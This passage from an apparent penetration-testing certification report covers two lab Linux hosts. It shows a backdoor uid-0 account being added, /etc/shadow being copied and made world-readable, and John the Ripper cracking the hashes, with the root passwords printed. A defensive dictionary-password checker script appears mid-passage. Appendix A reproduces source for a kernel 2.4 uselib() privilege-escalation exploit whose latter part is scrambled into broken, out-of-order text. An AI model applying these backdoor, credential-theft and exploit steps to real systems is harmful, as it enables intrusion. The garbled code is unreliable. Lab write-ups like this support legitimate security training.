[root@localhost kernel26_vmsplice]# useradd -u 0 -o -g 0 -d /root r00t
useradd: warning: the home directory already exists.
Not copying any file from skel directory into it.
[root@localhost kernel26_vmsplice]# passwd r00t
Changing password for user r00t.
New UNIX password:
BAD PASSWORD: it is based on a dictionary word
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
[root@localhost kernel26_vmsplice]#

iii. Gathering the shadow password file

With the successful creation of a method to gain root access in the future, the gathering of the shadow password file could be accomplished. In this case, the shadow password file was copied within the shell created by the Kernel vmsplice exploit. However, it could have also been gathered via the new “r00t” account.

[root@localhost kernel26_vmsplice]# cp /etc/shadow /tmp
[root@localhost kernel26_vmsplice]# chmod a+rw /tmp/shadow
[root@localhost kernel26_vmsplice]# cd /tmp
[root@localhost tmp]# ls -alF shadow
-rw-rw-rw- 1 root root 1235 Feb  7 04:08 shadow
[root@localhost tmp]#

J. Cracking passwords of the cptvm2 host

i. Cracking of “cptvm1”, “cptvm2”, “root” and “r00t”

The cracking of the cptvm2 accounts was trivial in comparison to the time the cptvm1 host had already taken (over 10 hours). Using only the default dictionary within john, the entire process took just over 6 minutes to complete. This was due to the existence of the root password within the standard john wordlist.

bt cptvm2 # john --session=cptvm2 shadow
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])
admin            (root)
windows          (cptvm1)
windows          (r00t)
linux            (cptvm2)
guesses: 4  time: 0:00:06:13 (3)  c/s: 4533  trying: linux
bt cptvm2 # john -show shadow
root:admin:14019:0:99999:7:::
cptvm1:windows:14019:0:99999:7:::
cptvm2:linux:14019:0:99999:7:::
r00t:windows:14282:0:99999:7:::

4 password hashes cracked, 0 left

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:
7/tcp echo
21/tcp ftp vsftpd 1.1.3
22/tcp ssh OpenSSH 3.5p1 (protocol 1.99)
23/tcp telnet Linux telnetd
79/tcp finger Linux fingerd
80/tcp http Apache httpd 2.0.40 (Red Hat Linux)
109/tcp POSSIBLY pop2
110/tcp pop3 ipopd 2001.78rh
111/tcp rpcbind 2 (rpc #100000)
143/tcp imap UW Imapd 2001.315rh
199/tcp smux Linux SNMP multiplexer
443/tcp ssl/http Apache httpd 2.0.40 (Red Hat Linux)
686/tcp rquotad 1-2 (rpc #100011)
993/tcp imaps
995/tcp pop3s
6000/tcp X11
32768/tcp status 1 (rpc #100024)
32770/tcp mountd 1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp echo
13/udp daytime
37/udp time (32 bits)
111/udp rpcbind 2 (rpc #100000)
123/udp ntp
161/udp snmp SNMPv1 server (public)
162/udp snmptrap
631/udp unknown
683/udp rquotad 1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm, gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, postgres, rpc, rpcuser, rpm, root, shutdown, smmsp, squid, sshd, sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/bin/at, /usr/bin/chage, /usr/bin/chfn, /usr/bin/chsh, /usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/lib/news/bin/inndstart, /usr/lib/news/bin/rnews, /usr/lib/news/bin/startinnfeed, /usr/libexec/openssh/ssh-keysign, /usr/sbin/ping6, /usr/sbin/suexec, /usr/sbin/traceroute, /usr/sbin/traceroute6, /usr/sbin/userhelper, /usr/sbin/userisdnctl, /usr/sbin/usernetctl, /usr/X11R6/bin/XFree86, /bin/mount, /bin/ping, /bin/su, /bin/umount, /sbin/pam_timestamp_check, /sbin/pwdb_chkpwd, /sbin/unix_chkpwd
Username/password: user/digital, cptvm1/windows, cptvm2/linux

cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.18-8
TCP ports: 22, 111, 939
TCP services:
22/tcp ssh OpenSSH 4.3 (protocol 2.0)
111/tcp rpcbind 2 (rpc #100000)
939/tcp status 1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus, distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, rpc, rpcuser, rpm, root, shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/bin/at, /usr/bin/chage, /usr/bin/chfn, /usr/bin/chsh, /usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/bin/sudoedit, /usr/bin/Xorg, /usr/kerberos/bin/ksu, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth, /usr/libexec/openssh/ssh-keysign, /usr/sbin/ccreds_validate, /usr/sbin/suexec, /usr/sbin/userhelper, /usr/sbin/userisdnctl, /usr/sbin/usernetctl, /bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs, /sbin/mount.nfs4, /sbin/umount.nfs, /sbin/umount.nfs4, /sbin/pam_timestamp_check, /sbin/unix_chkpwd, /media/.hal-mtablock
Username/password: cptvm1/windows, cptvm2/linux, r00t/windows, root/admin
K. Cracking passwords of the cptvm1 host – round 2

i. Cracking of “root” and “r00t”

At this point, the john utility had been running for quite some time without success. With such a difference in the amount of john run time between the cptvm1 and cptvm2 hosts, research into why was begun. Comparing the default wordlist used by john to the one that had been used during the brute force hydra attack showed that the john wordlist was far smaller. The original assumption was that the default john wordlist would most likely be optimized for password cracking. Therefore, the default wordlist was used as is. As all of the passwords discovered so far were standard dictionary words, it seemed logical that the rest of the passwords would most likely be dictionary words, too. With this in mind, a larger wordlist would be required. To generate this wordlist, the aspell master english dictionary was dumped, cleaned up and sorted. This resulted in a dictionary of roughly 118,000 words.

bt passwords # aspell dump master | sed s/\'//g | sort -u > matt.txt
bt passwords # wc -l matt.txt
118051 matt.txt
bt passwords # mv matt.txt 118051wordDictionary.txt
bt passwords # ll 118051wordDictionary.txt
-rw-r--r-- 1 503 503 1097205 Feb 15 23:05 118051wordDictionary.txt

With this new approach in mind, the initial john session was also aborted.

bt cptvm1 # john --session=cptvm1 --users=root shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0  time: 0:10:53:47 (3)  c/s: 5722  trying: 35885297
Session aborted

In addition, additional john sessions were created to use the googled password.txt file and the newly generated aspell dumped file.

bt cptvm1 # john --session=cptvm1-2 --users=root -wordlist=./passwords/passwords.txt shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0  time: 0:00:00:22 100%  c/s: 5502  trying: Ôªø!
bt cptvm1 # john --session=cptvm1-3 --users=root -wordlist=./passwords/118051wordDictionary.txt shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
cavalry          (root)
guesses: 1  time: 0:00:00:02 100%  c/s: 5511  trying: cavalry

Within 2 seconds, the password for the root account had been cracked. The results were far more impressive than anticipated. The john session that had been started to use the googled password.txt file as a wordlist was aborted.

Since we already know that the password to the r00t account is expl0ited, this last step wasn't really required. However, to be 100% complete, a john session was started to crack the r00t account. I cheated and placed the “expl0ited” password in the wordlist. As expected, john was able to crack the password in near record time.

bt cptvm1 # rm cptvm1.rec
bt cptvm1 # john --session=cptvm1 --users=r00t -wordlist=./passwords/118051wordDictionary.txt shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
expl0ited        (r00t)
guesses: 1  time: 0:00:00:09 100%  c/s: 4707  trying: expl0ited

Ultimately, all of the cptvm1 account passwords were cracked.

bt cptvm1 # john -show shadow
root:cavalry:14019:0:99999:7:::
user:digital:14019:0:99999:7:::
cptvm1:windows:14019:0:99999:7:::
cptvm2:linux:14019:0:99999:7:::
r00t:expl0ited:14272:0:99999:7:::

5 password hashes cracked, 0 left

I want those 11 hours of my life back, certification crew! :)

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:
7/tcp echo
21/tcp ftp vsftpd 1.1.3
22/tcp ssh OpenSSH 3.5p1 (protocol 1.99)
23/tcp telnet Linux telnetd
79/tcp finger Linux fingerd
80/tcp http Apache httpd 2.0.40 (Red Hat Linux)
109/tcp POSSIBLY pop2
110/tcp pop3 ipopd 2001.78rh
111/tcp rpcbind 2 (rpc #100000)
143/tcp imap UW Imapd 2001.315rh
199/tcp smux Linux SNMP multiplexer
443/tcp ssl/http Apache httpd 2.0.40 (Red Hat Linux)
686/tcp rquotad 1-2 (rpc #100011)
993/tcp imaps
995/tcp pop3s
6000/tcp X11
32768/tcp status 1 (rpc #100024)
32770/tcp mountd 1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp echo
13/udp daytime
37/udp time (32 bits)
111/udp rpcbind 2 (rpc #100000)
123/udp ntp
161/udp snmp SNMPv1 server (public)
162/udp snmptrap
631/udp unknown
683/udp rquotad 1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm, gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, postgres, rpc, rpcuser, rpm, root, shutdown, smmsp, squid, sshd, sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/bin/at, /usr/bin/chage, /usr/bin/chfn, /usr/bin/chsh, /usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/lib/news/bin/inndstart, /usr/lib/news/bin/rnews, /usr/lib/news/bin/startinnfeed, /usr/libexec/openssh/ssh-keysign, /usr/sbin/ping6, /usr/sbin/suexec, /usr/sbin/traceroute, /usr/sbin/traceroute6, /usr/sbin/userhelper, /usr/sbin/userisdnctl, /usr/sbin/usernetctl, /usr/X11R6/bin/XFree86, /bin/mount, /bin/ping, /bin/su, /bin/umount, /sbin/pam_timestamp_check, /sbin/pwdb_chkpwd, /sbin/unix_chkpwd
Username/password: user/digital, cptvm1/windows, cptvm2/linux, r00t/expl0ited, root/cavalry

cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.18-8
TCP ports: 22, 111, 939
TCP services:
22/tcp ssh OpenSSH 4.3 (protocol 2.0)
111/tcp rpcbind 2 (rpc #100000)
939/tcp status 1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus, distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, rpc, rpcuser, rpm, root, shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/bin/at, /usr/bin/chage, /usr/bin/chfn, /usr/bin/chsh, /usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/bin/sudoedit, /usr/bin/Xorg, /usr/kerberos/bin/ksu, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth, /usr/libexec/openssh/ssh-keysign, /usr/sbin/ccreds_validate, /usr/sbin/suexec, /usr/sbin/userhelper, /usr/sbin/userisdnctl, /usr/sbin/usernetctl, /bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs, /sbin/mount.nfs4, /sbin/umount.nfs, /sbin/umount.nfs4, /sbin/pam_timestamp_check, /sbin/unix_chkpwd, /media/.hal-mtablock
Username/password: cptvm1/windows, cptvm2/linux, r00t/windows, root/admin
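The round-2 cracking shows both sides of the same lesson: every password on these hosts was a dictionary word or, in the case of "expl0ited", a dictionary word with one letter swapped for a digit, which is why the host's own passwd rejected it with "BAD PASSWORD: it is based on a dictionary word" and why it fell as soon as the base word was in the list. The script below is an added example (not code from the report, and not pam_cracklib's implementation) of that check, built from the same tr/sed/sort/grep tools the report used to prepare its aspell wordlist: it normalises a candidate password the way a cracker's rules would and rejects it if any form is a wordlist entry. The wordlist is constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the report): reject passwords that are a dictionary
# word, a dictionary word with digits or punctuation glued on, or a dictionary
# word in leetspeak. The wordlist below is constructed.

WORDLIST='admin
cavalry
digital
exploited
linux
password
windows'

# unleet: lowercase the input and undo the usual digit/symbol-for-letter swaps
# (0->o, 1->l, 3->e, 4->a, 5->s, 7->t, 8->b, @->a, $->s, !->i), which is what
# a cracking rule set does in the other direction.
unleet() {
    tr 'A-Z' 'a-z' | tr '0134578@$!' 'oleastbasi'
}

# strip_ends: drop digits and punctuation glued to the front or back of a
# word ("windows7", "!linux").
strip_ends() {
    sed 's/^[^A-Za-z]*//; s/[^A-Za-z]*$//'
}

# candidates PW: the forms a wordlist attack would try first, one per line:
# as typed, ends stripped, leet undone, and both.
candidates() {
    pw=$(printf '%s\n' "$1" | tr 'A-Z' 'a-z')
    printf '%s\n' "$pw"
    printf '%s\n' "$pw" | strip_ends
    printf '%s\n' "$pw" | unleet
    printf '%s\n' "$pw" | strip_ends | unleet
}

# dictionary_based PW: exit 0 when any candidate form is exactly a wordlist
# entry (grep -x -F), the condition behind "based on a dictionary word".
dictionary_based() {
    words=$(mktemp) || return 1
    printf '%s\n' "$WORDLIST" > "$words"
    candidates "$1" | grep -q -x -F -f "$words" && rc=0 || rc=1
    rm -f "$words"
    return $rc
}

# verdict PW: one-line result for a password.
verdict() {
    if dictionary_based "$1"; then
        echo "rejected: based on a dictionary word"
    else
        echo "accepted by this check"
    fi
}

for pw in expl0ited Windows7 cavalry 'P@ssw0rd' 'Tr0ub4dor&3'; do
    printf '%-12s %s\n' "$pw" "$(verdict "$pw")"
done
```

With the report's own 118,051-word aspell dump in place of the constructed list, "expl0ited" and "cavalry" are rejected while a password that is not a single dictionary word in disguise, such as the last sample, passes this check and has to be judged by length and other rules instead.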
L. Ultimate goal

i. Cptvm1 and cptvm2 hosts compromised

The initial access to the cptvm1 host was obtained by brute force password guessing of the “user” account. After gaining basic access to the cptvm1 host, the “cptvm1” and “cptvm2” user accounts were brute force password attacked. This provided basic access to the cptvm2 host. The cptvm1 host was then compromised via a VMA exploit. Next, the cptvm2 host was compromised via a vmsplice exploit. Finally, the root passwords were cracked.

ii. Passwords for root accounts on cptvm1 and cptvm2

The password for root@cptvm1 is cavalry
The password for root@cptvm2 is admin

M. Lessons learned

i. Searching exploit sites

The quality of the exploits and exploit information varies radically between sites. For example, the milw0rm.com site has good quality code but limited information on the background of the exploit. In contrast, the www.securityfocus.com site has more extensive information about an exploit but may only list “Exploit code has been published” instead of actual exploit code. With such a wide footprint for searches in mind, a site like secwatch.org should be the preferred solution. However, it was found that certain searches don't perform well via secwatch.org. Ultimately, the use of a single site to complete exploit research isn't going to be a successful approach at this time.

ii. Attack vectors

All of the articles that I have read and the individuals that I have spoken with lately state that the majority of the future exploits will be found outside of the operating system. With this in mind, I focused my search on items surrounding the kernel but waited to research the kernel exploits until the end. This proved to be exactly the opposite of the approach that was required for this examination. Full research into the vulnerabilities of a target prior to attempting to execute any exploits is key. If this approach had been adhered to more, a full review of all of the vulnerabilities would have yielded the kernel exploits as the top contenders. This would have saved quite a bit of time compiling, debugging and testing unsuccessful exploits.

5. Appendix A. Source code for the Kernel 2.4 VMA exploit

/*
 * Linux kernel 2.4 uselib() privilege elevation exploit.
 *
 * I modified the Paul Starzetz's exploit, made it more possible
 * to race successfully. The exploit still works only on 2.4 series,
 * but not easy. It should be also works on 2.4 SMP.
 *
 * original exploit source from http://isec.pl
 * reference: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
 *
 * thx newbug.
 *
 * Tim Hsu <timhsu at chroot.org> Jan 2005.
 *
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <limits.h>
#include <sched.h>
#include <syscall.h>
#include <sys/mman.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/sysinfo.h>
#include <linux/elf.h>
#include <asm/page.h>
#include <linux/linkage.h>
#include <asm/ldt.h>
#include <asm/segment.h>

#define str(s) #s
#define xstr(s) str(s)
#define MREMAP_MAYMOVE 1

// temp lib location
#define LIBNAME "/tmp/_elf_lib"
// shell name
#define SHELL "/bin/bash"
// time delta to detect race
#define RACEDELTA 5000
// if you have more deadbabes in memory, change this
#define MAGIC 0xdeadbabe
// do not touch
#define SLAB_THRSH 128
#define SLAB_PER_CHLD (INT_MAX - 1)
#define LIB_SIZE ( PAGE_SIZE * 4 )
#define STACK_SIZE ( PAGE_SIZE * 4 )
#define LDT_PAGES ( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE )
#define ENTRY_GATE ( LDT_ENTRIES-1 )
#define SEL_GATE ( (ENTRY_GATE<<3)|0x07 )
#define ENTRY_LCS ( ENTRY_GATE-2 )
#define SEL_LCS ( (ENTRY_LCS<<3)|0x04 )
#define ENTRY_LDS ( ENTRY_GATE-1 )
#define SEL_LDS ( (ENTRY_LDS<<3)|0x04 )
#define kB * 1024
#define MB * 1024 kB
#define GB * 1024 MB
#define TMPLEN 256
#define PGD_SIZE ( PAGE_SIZE*1024 )

extern char **environ. static pid_t consume_pid. go = 0. static char name[TMPLEN]. static volatile int val = 0. static char line[TMPLEN]. static char cstack[STACK_SIZE]. finish = 0. ccnt=0. . inline _syscall2(int. int. void*. b. int. int. int. static char *myenv[] = {"TERM=vt100". old_esp. static int fstop=0. NULL}. vma_end. silent=0. static char hellc0de[] = "\x49\x6e\x74\x65\x6c\x65\x63\x74\x75\x61\x6c\x20\x70\x72\x6f\x70" "\x65\x72\x74\x79\x20\x6f\x66\x20\x49\x68\x61\x51\x75 \x65\x52\x00". map_addr. int. smp. "HISTFILE=/dev/null". int. smp_max=0. pidx. a. int. d. sys_mmap2. int. inline _syscall3(int. b. sys_munmap. c. b). addr_max. int. smp. "HISTFILE=/dev/null". int. smp_max=0. pidx. a. int. d. sys_mmap2. int.
int. map_flags = PROT_WRITE|PROT_READ. a. void*. a. #define #define #define #define #define #define #define #define __NR_sys_gettimeofday __NR_gettimeofday __NR_sys_sched_yield __NR_sched_yield __NR_sys_madvise __NR_madvise __NR_sys_uselib __NR_uselib __NR_sys_mmap2 __NR_mmap2 __NR_sys_munmap __NR_munmap __NR_sys_mprotect __NR_mprotect __NR_sys_mremap __NR_mremap inline _syscall6(int. int. sys_gettimeofday. void*. f). int. e. int. b. int. task_size. inline _syscall3(int. int. int. cpid. wtime=2. int. inline _syscall5(int. max_page. c. sys_mremap. addr_min. map_base=0. static struct timeval tm1. inline _syscall2(int. b. ptr. b). lib_addr. *libname=LIBNAME. int. int. a. map_count=0. void *. c). sys_mprotect. delta_max = RACEDELTA. tm2. bytecount ). d.delta = 0. static char *pagemap. a. pnum=0. uid. . a. c). vma_start. inline _syscall3( int. sys_madvise. *shellname=SHELL. e). modify_ldt. int critical) { int sig = critical? SIGSTOP : (fstop? SIGSTOP : SIGKILL). . l). if (vmem == NULL) { perror("malloc"). } // try to race do_brk sleeping on kmalloc. return -1.. vmem = malloc(info. sys_uselib. inline _syscall0(void. unlink(libname). char*. sig). for(.inline _syscall1(int.freeram).) kill(0. } void fatal(const char *message. SIGKILL). entering endless loop"). return r. "\n[-] FAILED: %s (%s) ". message. message). r=t2->tv_sec . r+=t2->tv_usec . 0x90. kill(cpid. struct timeval *t2) { int r. may need modification for SMP int raceme(void* v) { finish=1.) { errno = 0.freeram). sysinfo(&info). printf("\n"). for(. fflush(stdout). (char*) (strerror(errno)) ). } inline int tmdiff(struct timeval *t1. info. if(!errno) { fprintf(stdout. r*=1000000.t1->tv_sec. char *vmem.. } else { fprintf(stdout. int consume_memory() { struct sysinfo info. "\n[-] FAILED: %s ". } memset(vmem. } if(critical) printf("\nCRITICAL.t1->tv_usec. sys_sched_yield). // check if raced: recheck: if(!go) sys_sched_yield(). 
sys_gettimeofday(&tm2, NULL); delta = tmdiff(&tm1, &tm2); if(!smp_max && delta < (unsigned)delta_max) goto recheck; smp = smp_max; // check if lib VMAs exist as expected under race condition recheck2: val = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL); if(val) continue; errno = 0; val = sys_madvise((void*) (lib_addr+PAGE_SIZE), LIB_SIZE-PAGE_SIZE, MADV_NORMAL); if( !val || (val<0 && errno!=ENOMEM) ) continue; // SMP? smp--; if(smp>=0) goto recheck2; // recheck race if(!go) continue; finish++; we need to free one vm_area_struct for mmap to work val = sys_mprotect(map_addr, PAGE_SIZE, map_flags); if(val) fatal("mprotect", 0); val = sys_mmap2(lib_addr + PAGE_SIZE, PAGE_SIZE*3, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(-1==val) fatal("mmap2 race", 0); printf("\n[+] race won maps=%d", map_count); fflush(stdout); kill(consume_pid, SIGKILL); _exit(0); } // return 0; } int callme_1() { return val++; } inline int valid_ptr(unsigned ptr) { return ptr>=task_size && ptr<addr_min-16; } inline int validate_vma(unsigned *p, unsigned s, unsigned e) { unsigned *t; if(valid_ptr(p[0]) && valid_ptr(p[3]) && p[1]==s && p[2]==e) { t=(unsigned*)p[3]; if( t[0]==p[0] && t[1]<=task_size && t[2]<=task_size ) return 1; } return 0; } asmlinkage void kernel_code(unsigned *task) { unsigned *addr = task; // find & reset uids while(addr[0] != uid || addr[1] != uid || addr[2] != uid || addr[3] != uid) addr++; addr[0] = addr[1] = addr[2] = addr[3] = 0; addr[4] = addr[5] = addr[6] = addr[7] = 0; // find & correct VMA for(addr=(unsigned *)task_size; (unsigned)addr<addr_min-16; addr++) { if( validate_vma(addr, vma_start, vma_end) ) { addr[1] = task_size - PAGE_SIZE; addr[2] = task_size; break; } } } void kcode(void); // CPL0 code mostly stolen from cliph void __kcode(void) { asm( "kcode: " pusha \n" " pushl %es \n" " pushl %ds \n" " movl $(" xstr(SEL_LDS) ") ,%edx \n" " movl %edx,%es \n" " movl %edx,%ds \n" " movl $0xffffe000,%eax \n" " andl %esp,%eax \n" " pushl %eax \n" " 
call kernel_code \n" " addl $4, %esp \n" " popl %ds \n" " popl %es \n" " popa \n" " lret \n" ); } int callme_2() { return val + task_size + addr_min; } void sigfailed(int v) { ccnt++; fatal("lcall", 1); } // modify LDT & exec void try_to_exploit(unsigned addr) { volatile int r, *v; printf("\n[!] try to exploit 0x%.8x", addr); fflush(stdout); \n" unlink(libname); r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE|map_flags); if(r) fatal("mprotect 1", 1); // check if really LDT v = (void*) (addr + (ENTRY_GATE*LDT_ENTRY_SIZE % PAGE_SIZE) ); signal(SIGSEGV, sigfailed); r = *v; if(r != MAGIC) { printf("\n[-] FAILED val = 0x%.8x", r); fflush(stdout); fatal("find LDT", 1); } // yeah, setup CPL0 gate v[0] = ((unsigned)(SEL_LCS)<<16) | ((unsigned)kcode & 0xffffU); v[1] = ((unsigned)kcode & ~0xffffU) | 0xec00U; printf("\n[+] gate modified ( 0x%.8x 0x%.8x )", v[0], v[1]); fflush(stdout); // setup CPL0 segment descriptors (we need the 'accessed' versions ;-) v = (void*) (addr + (ENTRY_LCS*LDT_ENTRY_SIZE % PAGE_SIZE) ); v[0] = 0x0000ffff; /* kernel 4GB code at 0x00000000 */ v[1] = 0x00cf9b00; v = (void*) (addr + (ENTRY_LDS*LDT_ENTRY_SIZE % PAGE_SIZE) ); v[0] = 0x0000ffff; /* kernel 4GB data at 0x00000000 */ v[1] = 0x00cf9300; // reprotect to get only one big VMA r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|map_flags); if(r) fatal("mprotect 2", 1); CPL0 transition sys_sched_yield(); val = callme_1() + callme_2(); asm("lcall $" xstr(SEL_GATE) ",$0x0"); //if( getuid()==0 || (val==31337 && strlen(hellc0de)==31337) ) { if (getuid()==0) { printf("\n[+] exploited, uid=0\n\n" ); fflush(stdout); } else { printf("\n[-] uid change failed" ); fflush(stdout); sigfailed(0); } signal(SIGTERM, SIG_IGN); kill(0, SIGTERM); setresuid(0, 0, 0); execl(shellname, "sh", NULL); fatal("execl", 0); // } void scan_mm_finish(); void scan_mm_start(); // kernel page table scan code void scan_mm() { map_addr -= PAGE_SIZE; if(map_addr <= (unsigned)addr_min) scan_mm_start(); scnt=0; val = *(int*)map_addr; 
seg_32bit = 1. } void scan_mm_finish() { retry: __asm__("movl%0. l. } else { sys_madvise((void*)map_addr. } else if(npg == LDT_PAGES) { npg=0. sizeof(l)). sizeof(l)) != 0 ) fatal("modify_ldt". l. static struct modify_ldt_ldt_s l. } // make kernel page maps before and after allocating LDT void scan_mm_start() { static int npg=0. %%esp" : :"m"(old_esp) ). pidx++) { if(pagemap[pidx]) { npg++. goto retry.scan_mm_finish(). 0. pidx = max_page-1. pidx<=max_page-1. if( modify_ldt(1. } // save context & scan page table __asm__("movl%%esp. } else { npg=0. scan_mm(). //static struct user_desc l. } . PAGE_SIZE. %0" : :"m"(old_esp) ).limit = MAGIC & 0xffff. l. } } fatal("find LDT". if(pnum==1) { pidx = max_page-1. try_to_exploit(addr_min+(pidx-1)*PAGE_SIZE).base_addr = MAGIC >> 16. scan_mm(). } else if(pnum==2) { memset(&l. if(scnt) { pagemap[pidx] ^= 1. map_addr = addr_max. } pidx--. l. pnum++.entry_number = LDT_ENTRIES-1. } else if(pnum==3) { npg=0.limit_in_pages = 1. 1). 1). l. MADV_DONTNEED). for(pidx=0. &l. } memmaped_size += PAGE_SIZE. d. "r"). do { c = u = a = -1. WNOHANG|WUNTRACED). if(MAP_FAILED == r) { printf("--> prepare_slab(). sizeof(line) . map_flags. &d). . } // child reap void reaper(int v) { ccnt++. &d. *r = map_addr. &d. 0). // leave one object in the SLAB inline void prepare_slab() { int *r. } while (strcmp(name. close(fileno(fp)).1. 0).1. PAGE_SIZE. name. return c == 7 ? a . fp = fopen("/proc/slabinfo". map_count++. map_addr -= PAGE_SIZE. // so just use anyone of the two but take care about the flags void check_vma_flags(). &v. u = 0. r = (void*)sys_mmap2((unsigned)map_addr. sizeof(name) . } // sig handlers void segvcnt(int v) { scnt++. &u. fclose(fp)... fp)) break. map_flags ^= PROT_READ. sn)). FILE *fp=NULL. memmaped_size/1024/1024). if(!fp) fatal("get_slab_objs: fopen". fp). 0). c = sscanf(line. } long memmaped_size = 0. MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED. "%s %u %u %u %u %u %u".u : -1. %dMb\n". if (!fgets(line. char x1[20]. scan_mm_finish(). a = 0. 
waitpid(0. &a. fatal("try again". fgets(name. } // sometimes I get the VMAs in reversed order.// return number of available SLAB objects in cache int get_slab_objs(const char *sn) { static int c. &d. 0. } signal(SIGSEGV..) { r = get_slab_objs("vm_area_struct"). if(finish) break. 0). ccnt=0. r=sys_uselib(libname).r). r--. cpid = clone(&raceme. } void check_vma_flags() { if(map_flags) { __asm__("movl%%esp. fflush(stdout). //printf("\nfree slab = %d\n". // wipe lib VMAs and try again r = sys_munmap(lib_addr. NULL). synchronize threads while(!finish) sys_sched_yield(). } else { __asm__("movl%0. sz. check_vma_flags(). 0). pcnt=0. goto out. %0" : :"m"(old_esp) ). if(ccnt) goto failed. fflush(stdout). } try to hit the kmalloc race for(. (void*) &cstack[sz-16]. static char smiley[]="-\\|/-\\|/". val = * (unsigned*)(lib_addr + PAGE_SIZE). %%esp" : :"m"(old_esp) ). while(r != 1 && r > 0) { prepare_slab(). LIB_SIZE). if(r) fatal("munmap lib". vreversed). getpid() ). sz = sizeof(cstack) / sizeof(cstack[0]).void vreversed(int v) { map_flags = 0. CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD. if(!silent) { printf("\n"). out: } // use elf library and try to sleep on kmalloc void exploitme() { int r. } sys_gettimeofday(&tm1. go = 0. NULL ). go = 1. 0). helper clone finish=0. // // . // // printf("\n cat /proc/%d/maps". finish=0. if(r) fatal("uselib". if(-1==cpid) fatal("clone". if(-1==r) { fatal("mprotect brk".. &tm2). if( wtime*1000000U <= (unsigned)delta ) break. MADV_NORMAL). } } vma_start = lib_addr + PAGE_SIZE. printf("\n expanded VMA (0x%. 0). 0). if(r) fatal("munmap 2". for(. . segvcnt). 0). if(r) fatal("madvise". } we need to check the PROT_EXEC flag map_flags = PROT_EXEC.8x)". NULL). segvcnt). map_base-map_addr + PAGE_SIZE). delta = tmdiff(&tm1.PAGE_SIZE. if(!map_flags) { printf("\n VMAs reversed"). LIB_SIZE-PAGE_SIZE.. sz = (0-lib_addr) . 0). r = sys_mremap(lib_addr + LIB_SIZE-PAGE_SIZE. } // seems we raced.LIB_SIZE . free mem r = sys_munmap(map_addr. 
